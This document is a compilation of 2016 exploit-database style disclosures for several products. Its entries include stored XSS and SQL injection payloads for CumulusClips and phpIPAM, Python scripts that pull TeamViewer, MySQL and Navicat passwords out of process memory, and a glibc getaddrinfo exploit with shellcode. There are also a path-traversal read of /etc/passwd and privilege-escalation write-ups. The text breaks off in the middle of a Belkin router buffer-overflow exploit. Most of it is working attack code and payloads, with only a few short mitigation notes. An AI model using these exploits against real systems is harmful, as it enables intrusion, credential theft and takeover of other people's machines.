#######################################################
# Exploit Title: CumulusClips Persistent XSS
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
Any registered user may inject a code to main site. There is no HTTPonly flag on cookies so it is possible to steal session information.
PoC:
locations:
/cumulusclips/account/videos/edit/
/cumulusclips/account/upload/video/
POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/
Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video
reflected on main site:
GET /cumulusclips/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/
Connection: close
RESPONSE:
...
div class="video">
<div class="thumbnail">
<a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>">
<img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" />
...
Post exploitation:
Since it is posible to steal the cookie and impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel.
Remediation:
Validate user input for special characters (preferable white list), use HTTPonly header
#####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
from winappdbg import Debug, Process, HexDump
import sys
import re
filename = 'TeamViewer.exe'
def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.
# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]
print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')
found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'
if len(found) > 1:
s = list(set([x for x in found if found.count(x) > 1]))
for i in s:
pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
return found
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# For all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid)
finally:
debug.stop()
/*
add by SpeeDr00t@Blackfalcon (jang kyoung chip)
This is a published vulnerability by google in the past.
Please refer to the link below.
Reference:
- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
- https://github.com/fjserna/CVE-2015-7547
- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow
When Google announced about this code(vulnerability),
it was missing information on shellcode.
So, I tried to completed the shellcode.
In the future, I hope to help your study.
(gdb) r
Starting program: /home/haker/client1
Got object file from memory but can't read symbols: File truncated.
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60259
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = ��foobargooglecom
query = foobargooglecom$(�foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send
sendto 1
TCP Connected with 127.0.0.1:60260
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = ��foobargooglecom
query = foobargooglecom$�7foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
process 6415 is executing new program: /bin/dash
$ id
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
$
*/
import socket
import time
import struct
import threading
IP = '192.168.111.5' # Insert your ip for bind() here...
ANSWERS1 = 184
terminate = False
last_reply = None
reply_now = threading.Event()
def dw(x):
return struct.pack('>H', x)
def dd(x):
return struct.pack('>I', x)
def dl(x):
return struct.pack('<Q', x)
def db(x):
return chr(x)
def udp_thread():
global terminate
# Handle UDP requests
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((IP, 53))
reply_counter = 0
counter = -1
answers = []
while not terminate:
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id_udp = struct.unpack('>H', data[0:2])[0]
query_udp = data[12:]
# Send truncated flag... so it retries over TCP
data = dw(id_udp) # id
data += dw(0x8380) # flags with truncated set
data += dw(1) # questions
data += dw(0) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query_udp # question
data += '\x00' * 2500 # Need a long DNS response to force malloc
answers.append((data, addr))
if len(answers) != 2:
continue
counter += 1
if counter % 4 == 2:
answers = answers[::-1]
print 'udp send '
time.sleep(0.01)
sock_udp.sendto(*answers.pop(0))
print 'sendto 1 '
reply_now.wait()
sock_udp.sendto(*answers.pop(0))
print 'sendto 2 '
sock_udp.close()
def tcp_thread():
global terminate
counter = -1
#Open TCP socket
sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_tcp.bind((IP, 53))
sock_tcp.listen(10)
print 'a'
while not terminate:
conn, addr = sock_tcp.accept()
counter += 1
print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])
# Read entire packet
data = conn.recv(1024)
print '[TCP] Total Data len recv ' + str(len(data))
reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])
print '[TCP] Request1 len recv ' + str(reqlen1)
data1 = data[2:2+reqlen1]
print 'data1 = ' +data1
id1 = struct.unpack('>H', data1[0:2])[0]
query1 = data[12:]
print 'query = ' + query1
# Do we have an extra request?
data2 = None
if len(data) > 2+reqlen1:
reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])
print '[TCP] Request2 len recv ' + str(reqlen2)
data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]
id2 = struct.unpack('>H', data2[0:2])[0]
query2 = data2[12:]
# Reply them on different packets
data = ''
data += dw(id1) # id
data += dw(0x8180) # flags
data += dw(1) # questions
data += dw(ANSWERS1) # answers
data += dw(0) # authoritative
data += dw(0) # additional
data += query1 # question
for i in range(ANSWERS1):
answer = dw(0xc00c) # name compressed
answer += dw(1) # type A
answer += dw(1) # class
answer += dd(13) # ttl
answer += dw(4) # data length
answer += 'D' * 4 # data
data += answer
data1_reply = dw(len(data)) + data
if data2:
data = ''
data += dw(id2)
data += 'A' * (6)
data += '\x08\xc5\xff\xff\xff\x7f\x00\x00'
data += '\x90' * (44)
data += '\x90' * (1955)
data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
data += '\x90' * (100)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'F' * (8)
data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
data += 'G' * (134)
data2_reply = dw(len(data)) + data
else:
data2_reply = None
reply_now.set()
time.sleep(0.01)
conn.sendall(data1_reply)
print 'data1_reply'
time.sleep(0.01)
if data2:
conn.sendall(data2_reply)
print 'data2_reply'
reply_now.clear()
sock_tcp.shutdown(socket.SHUT_RDWR)
sock_tcp.close()
if __name__ == "__main__":
t = threading.Thread(target=udp_thread)
t.daemon = True
t.start()
tcp_thread()
terminate = True
PHPIPAM 1.2.1 Multiple Vulnerabilities
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: 06 Sep 2016
Tested Version: phpipam-1.2.1 (Latest Version - modified on 2016-02-13)
Vendor: http://phpipam.net/
Product URL: https://sourceforge.net/projects/phpipam/
Date: 20 Mar 2016
About Product:
---------------
phpipam is an open-source web IP address management application (IPAM). Its goal is to provide light, modern and useful IP address management.
It is php-based application with MySQL database backend, using jQuery libraries, ajax and some HTML5/CSS3 features.
Vulnerability Report:
----------------------
SQL Injection Vulnerability (3 Items):
on Tools>Changelog
[sPage] Parameter is vulnerable against SQLi.
Method: GET
Payload:
http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50' [SQLi]
on http://[Site]/phpipam/app/tools/user-menu/user-edit.php
[lang] and [printLimit] Parameters are vulnerable against SQLi.
Payload:
Method : POST
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&mailNotify=No&mailChangelog=No&printLimit=30&lang=9'[SQLi]
OR
Method : POST
http://[Site]/phpipam/app/tools/user-menu/user-edit.php
PostData=
real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&lang=9&mailNotify=No&mailChangelog=No&printLimit=30'[SQLi]
===============================================
XSS Vulnerability (36 Items):
Method: POST
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2"><script>alert(document.cookie);</script>&action=edit
http://[Site]/phpipam/app/admin/languages/edit.php
PostData:
langid=2&action=edit"><script>alert(document.cookie);</script>
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/widgets/edit.php
PostData:
wid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/scan-agents/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/groups/edit-group.php
PostData:
id=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/users/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/tags/edit.php
PostData:
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/instructions/preview.php
PostData:
instructions=You+can+write+instructions+under+admin+menu!"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/sections/edit.php
PostData:
sectionId=2&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=2&subnetId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=1&subnetId=5&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&location=IPaddresses
http://[Site]/phpipam/app/admin/devices/edit.php
PostData:
switchId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/device-types/edit.php
PostData:
tid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&vlanNum=
http://[Site]/phpipam/app/admin/vlans/edit.php
PostData:
vlanId=1&action=edit&vlanNum="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add
http://[Site]/phpipam/app/admin/vlans/edit-domain.php
PostData:
id=&action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit
http://[Site]/phpipam/app/admin/nameservers/edit.php
PostData:
nameserverId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fieldName=&table=ipaddresses
http://[Site]/phpipam/app/admin/custom-fields/edit.php
PostData:
action=add&fieldName=&table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/custom-fields/filter.php
PostData:
table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/replace-fields/result.php
PostData:
field=description"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&search=a&csrf_cookie=892d2a900ec7fc1ba9486ec171a36f71&replace=a
http://[Site]/phpipam/app/admin/subnets/edit.php
PostData:
sectionId=1&subnetId=6&action=edit&location=IPaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/admin/subnets/edit-folder.php
PostData:
sectionId=2&subnetId="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=add&location=IPaddresses
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&fval=a&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&direction=hostname%7Casc
http://[Site]/phpipam/app/tools/devices/devices-print.php
PostData:
ffield=hostname&fval=a&direction=hostname%7Casc"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/app/tools/subnet-masks/popup.php
PostData:
closeClass=hidePopups"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
Method: GET
http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
Title: WIN-911 - Insecure File Permissions EoP
CWE Class: CWE-276: Incorrect Default Permissions
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to escalate their privilege to system administrator
or SYSTEM on vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
PoC 1:
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to modify files within this location.
Besides executables running with administrative privileges there are also various services binaries.
These all run as SYSTEM and might be overwritten to obtain SYSTEM level access:
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Inbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\Mobile-911 Bridge Outbound.exe
C:\Program Files\Specter Instruments\WIN-911 V7\viewLinc Bridge.exe
PoC 2:
The web-server is installed as a separate component under:
"C:\Program Files\Specter Instruments\WEB-911 Services"
This directory allows EVERYONE full-control.
Once exploited, this could affect remote users connecting to the web-server.
- 3. Mitigation: -
None.
If you are brave, edit the permissions.
Not sure how this impacts the application.
- 4. Author: -
sh4d0wman
################################################################
Title: WIN-911 - Credential Disclosure
CWE Class: CWE-276: Incorrect Default Permissions | CWE-256: Plaintext Storage of a Password
Date: 05/09/2016
Vendor: Win911
Product: WIN-911
Type: Alarm Notification Software
Version: V7.17.00
Download URL: through Rockwell Automation downloads:
http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?crumb=112
Filter on "win-911", "software", "all families"
Tested on: Windows 7x86 EN
Release mode: no bugbounty program, public release
- 1. Product Description: -
The most widely used alarm notification software for the automation industry.
WIN-911 is used by hundreds of Fortune 500 and Global 500 companies.
- 2. Technical Details/PoC: -
This vulnerability allows attackers to obtain certain usernames and passwords on
vulnerable installations of Win-911.
An attacker must have a valid user-account on the system.
The product is installed under "C:\Program Files\Specter Instruments\WIN-911 V7".
This directory allows EVERYONE to read and modify files within this location.
During configuration an .ini file is populated with information.
Some of this information is sensitive.
The following settings will log credentials in plain-text:
FIX Remote Alarm
ArchestrA Direct Connect
viewLinc Direct Connect
WIN911 Pager
E-mail POP and SMTP
- 3. Mitigation: -
None yet.
- 4. Author: -
sh4d0wman
#####
# MySQL 5.5.45 (64bit) Local Credentials Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.mysql.com
# Date 05/09/2016
# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
#
# http://www.black-rose.ml
#
# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
#####
# MySQL v5.5.45 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to the database.
# Proof-Of-Concept Code:
#####
import time
from winappdbg import Debug, Process
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
usr = ''
pwd = ''
count = 0
filename = "mysql.exe"
process_pid = 0
memory_dump = []
passwd = []
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
memory_dump.append(process.read(address,30))
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
last = first.split(" 00 2D 70")
if last[0]:
usr = h2b(last[0])
memory_dump = []
for address in process.search_bytes('\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
memory_dump.append(process.read(address,100))
sorted(set(memory_dump))
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
string = str.split('00 8F')
for x in range(len(string)):
if x == 1:
passwd = string
try:
pwd = h2b(passwd[1].split('00 00')[0])
except:
pass
print "[~] Trying to extract credentials from memory.."
time.sleep(1)
if usr != '' and pwd != '':
print "[+] Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
else:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'" % (filename)
debug.loop()
finally:
debug.stop()
Title: ArcServe UDP - Unquoted Service Path Privilege Escalation
CWE Class: CWE-427: Uncontrolled Search Path Element
Date: 04/09/2016
Vendor: ArcServe
Product: ArcServe UDP Standard Edition for Windows, TRIAL
Type: Backup Software
Version: 6.0.3792 Update 2 Build 516
Download URL: http://arcserve.com/free-backup-software-trial/
Tested on: Windows 7x86 EN
Release Mode: coordinated release
- 1. Product Description: -
A comprehensive solution that empowers even a one-person IT department to protect virtual and physical environments with a high degree of simplicity:
Design and manage your entire data protection strategy with a unified management console
Scale your data backup coverage as your organization grows with the push of a button
- 2. Vulnerability Details: -
ArcServe UDP for Windows installs various services.
One of them is the "Arcserve UDP Update Service (CAARCUpdateSvc)" running as SYSTEM.
This particular service has an insecurely quoted path.
Other services where correctly quoted.
An attacker with write permissions on the root-drive or directory in the search path
could place a malicious binary and elevate privileges.
- 3. PoC Details: -
There are various ways to audit for this type of vulnerability.
This proof-of-concept demonstrates both an automated and manual way.
Step 1: Identify the issue
Automatic: use the windows-privesc-check toolkit to audit the local system.
Manual: run 'sc qc CAARCUpdateSvc' and confirm it has an unquoted service path.
Output: C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe
This should be: "C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe"
Step 2: Assess if exploitation is possible
To exploit this issue assess the permissions of each folder in the path using space as a token.
If any of the directories is writable for a non-administrative user, try to exploit the issue.
Step 3 Exploitation:
Place a binary with the correct name in the vulnerable directory.
Reboot the system and validate your payload is executed with SYSTEM privileges
- 4. Vendor Mitigation: -
Create an update for the product which add quotes to the path.
While the update is being developed customers could apply a manual fix:
Open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services
Add quotes to the ImagePath value of the relevant service.
- 5. End-user Mitigation: -
A patch has been released by Arcserve.
All customer should upgrade to the latest version as described in the release notes:
http://documentation.arcserve.com/Arcserve-UDP/Available/V6/ENU/Bookshelf_Files/HTML/Update3/Default.htm#Update3/upd3_Issues_Fixed.htm%3FTocPath%3D_____6
- 6. Author: -
sh4d0wman / Herman Groeneveld
herman_worldwide AT hotmail. com
- 7. Timeline: -
* 01/06/2016: Vulnerability discovery
* 18/06/2016: Request sent to info@arcserve.com for a security point-of-contact
* 21/06/2016: Received contact but no secure channel. Requested confirmation to send PoC over unsecure channel
* 22/06/2016: vendor supplied PGP key, vulnerability PoC sent
* 09/07/2016: Received information: 2 out of 3 issues have fixes pending.
Vendor requests additional mitigation techniques for the third issue.
* 13/07/2016: Sent vendor various mitigation solutions and their limitations.
* 13/08/2016: Vendor informs release is pending for all discovered issues.
* 15/08/2016: Vendor requests text for release bulletin.
* 19/08/2016: A fix has been released.
#####
# Navicat Premium 11.2.11 (64bit) Local Password Disclosure
# Tested on Windows Windows Server 2012 R2 64bit, English
# Vendor Homepage @ https://www.navicat.com/
# Date 05/09/2016
# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
#
# http://www.black-rose.ml
#
# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
#####
# Navicat Premium client v11.2.11 is vulnerable to local password disclosure, the supplied password is stored in a plaintext format in memory process.
# A potential attacker could reveal the supplied password in order to gain access to the database.
# Proof-Of-Concept Code:
#####
import time
from winappdbg import Debug, Process
count = 0
found = 0
filename = "navicat.exe"
process_pid = 0
memory_dump = []
def b2h(str):
return ''.join(["%02X " % ord(x) for x in str]).strip()
def h2b(str):
bytes = []
str = ''.join(str.split(" "))
for i in range(0, len(str), 2):
bytes.append(chr(int(str[i:i+2], 16)))
return ''.join(bytes)
debug = Debug()
try:
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
memory_dump.append(process.read(address,30))
memory_dump.pop(0)
for i in range(len(memory_dump)):
str = b2h(memory_dump[i])
first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
last = first.split("00 ")
if last[0]:
count = count+1
found = 1
print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
if found == 0:
print "[-] Password not found! Make sure the client is connected at least to one database."
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
######################
# Exploit Title : WordPress RB Agency 2.4.7 Plugin - Local File Disclosure
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://rbplugin.com/
# Category [ Webapps ]
# Tested on [ Win ]
# Version : 2.4.7
# Date 2016/09/03
######################
PoC
The Vulnerable page is
/ext/forcedownload.php
http://server/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../etc/passwd
Youtube:https://youtu.be/5kE8Xt-My9A
######################
# Discovered by : Mojtaba MobhaM Mail:Kazemimojtaba@live.com
# B3li3v3 M3 I will n3v3r St0p
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
import socket, sys , base64, struct, string, urllib
from getopt import getopt as GetOpt, GetoptError
from uuid import getnode as get_mac
import SimpleHTTPServer, SocketServer
# TIMELINE #
'''
3/16/2016 - First Submission to Belkin [no response]
5/3/2016 - Second Submission to Belkin [no response]
6/4/2016 - Notification of 0day [vendor responded]
Vendor Response: Our email system was broken but we want another 90 days.
9/3/2016 - Notification of 0day sent to Belkin. [no response]
9/4/2016 - The second 90 day extension is over.
'''
# Root cause analysis and all of that fun stuff
'''
This is the CSRF PoC. You will need to embed your JS soruce somewhere. '<script src=//ip.addr/a.js>'
The SSID of the F9K1122v1 does not escape HTML chars so XSS is possible.
XSS is also possible during provisioning. It does not escape HTML chars while scanning for SSIDs.
There is no protection against CSRFs so I made this CSRF PoC.
The BoF Vulnerability:
File Name: fmmgmt.c
-------------------------------------------------------------
void formSetLanguage(webs_t wp, char_t *path, char_t *query)
{
[CUT]
...
if(apmib_set(MIB_WEB_LANGUAGE, (void *)&type)==0){
strcpy(tmpbuf, T("Set WEB language error!"));
goto setErr;
}
apmib_update(CURRENT_SETTING);
setErr:
urltmp = websGetVar(wp, T("webpage"), T(""));
sprintf(tmpbuf, "/%s", urltmp);
-------------------------------------------------------------
In a nutshell, cause the error and then the webpage parameter will get picked up and then sprintf! yay!
ASLR is broken on this device so ret2libc is possible. Stack + Heap = Executable.
'''
# GREETZ
'''
@AustinHackers - I love you all <3
@Laughing_Mantis - Cause I said I would!
@MisterCh0c - Keep on h4x0ring IoT products!
@IoTVillage - You guys rock!
@HeadlessZeke - Thanks for influcencing me to challenge myself aka I wanted to show you up :D
@avicoder - cause you're awesome! :D
@TheZDI - If it weren't for your comment of wanting me to bypass auth then I wouldn't of found these vulns.
Everyone over at Praetorian - You guys are awesome <3.
'''
def usage():
print ""
print "CSRF Generator --> Buffer Overflow PoC [Needs to be ran as a SuperUser]"
print "By: Elvis Collado [b1ack0wl]"
print ""
print "Usage: %s -s source.ip -d dst.ip" % sys.argv[0]
print ""
print "\t-s Connect back IP [LHOST]"
print "\t-d Destination IP of Socket Listener [RHOST]"
print "\t-h Print this Help Menu"
print ""
sys.exit(1)
# Hacky but whatever it gets the point across.
if len(sys.argv) < 3:
usage()
try:
(opts, args) = GetOpt(sys.argv[1:], 's:d:h')
except GetoptError, e:
usage()
for opt, arg in opts:
if opt == "-s":
connectback_ip = arg.split(".")
for a in connectback_ip:
if int(a) == 0:
print "IP cannot have NULL Bytes :("
sys.exit(1)
IP_1= struct.pack("<B",int(connectback_ip[0]))
IP_2= struct.pack("<B",int(connectback_ip[1]))
IP_3= struct.pack("<B",int(connectback_ip[2]))
IP_4= struct.pack("<B",int(connectback_ip[3]))
elif opt == "-d":
host = arg
elif opt == "-h":
usage()
# Shellcode from bowcaster.
shellcode = string.join([
"\x24\x0f\xff\xfa", # li t7,-6
